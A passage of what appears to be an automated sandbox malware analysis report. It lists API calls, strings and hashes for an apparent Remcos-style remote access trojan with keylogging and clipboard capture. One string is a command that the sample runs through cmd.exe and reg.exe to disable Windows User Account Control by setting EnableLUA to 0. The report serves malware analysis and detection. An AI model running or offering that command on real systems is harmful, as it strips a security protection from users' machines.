                                                                                                                                                                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                                                                                                                                                                                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 221034970-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                                                                                                                                                                                                                                                                • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Enum$InfoQueryValue
                                                                                                                                                                                                                                                                                                • String ID: [regsplt]$DG
                                                                                                                                                                                                                                                                                                • API String ID: 3554306468-1089238109
                                                                                                                                                                                                                                                                                                • Opcode ID: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                                                                                                                                                                                                                                                                • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                                                                                                                                                                                                                • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                                                                                                                                                                                                                                • API String ID: 2974294136-753205382
                                                                                                                                                                                                                                                                                                • Opcode ID: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                                                                                                                                                                                                                                                                • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: EventLocalTimewsprintf
                                                                                                                                                                                                                                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                                                                                                                                                                • API String ID: 1497725170-248792730
                                                                                                                                                                                                                                                                                                • Opcode ID: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                                                                                                                                                                                                                                                                • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                                                                                                                                                • String ID: `AG
                                                                                                                                                                                                                                                                                                • API String ID: 1958988193-3058481221
                                                                                                                                                                                                                                                                                                • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                                                                                                                                                                                                                                                                • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                                                                                                                                                                                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041CA91
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                                                                                                                                                                • String ID: 0$MsgWindowClass
                                                                                                                                                                                                                                                                                                • API String ID: 2877667751-2410386613
                                                                                                                                                                                                                                                                                                • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                                                                                                                                                                                                                • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                                                                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                • API String ID: 2922976086-4183131282
                                                                                                                                                                                                                                                                                                • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                                                                                                                                                                                • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 004425F9
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 0044262F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                                                                                                                                                                                • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B70,0040483F,00000001,?,?,00000000,00475B70,004017F3), ref: 00404AED
                                                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404AF9
                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404B04
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404B0D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                                                                                                                                                • String ID: KeepAlive | Disabled
                                                                                                                                                                                                                                                                                                • API String ID: 2993684571-305739064
                                                                                                                                                                                                                                                                                                • Opcode ID: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                                                                                                                                                                                                                                                                • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                                                                                                                                                                                                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                                                                                                                                                                                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                                                                                                                                                                                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                                                                                                                                                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                                                                                                                                                                                • API String ID: 3024135584-2418719853
                                                                                                                                                                                                                                                                                                • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                                                                                                                                                                                                                • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                • String ID: GetCursorInfo$User32.dll$`#v
                                                                                                                                                                                                                                                                                                • API String ID: 1646373207-1032071883
                                                                                                                                                                                                                                                                                                • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                                                                                                                                                                                                                • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                                                                                                                                                                                                                                                                • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3525466593-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                                                                                                                                                                                                                • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4269425633-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                                                                                                                                                                                                                                                                • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                                                                                                                                                                                • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53), ref: 0044FF20
                                                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?), ref: 0044FFA9
                                                                                                                                                                                                                                                                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?,00000002,?), ref: 0044FFBB
                                                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0044FFC4
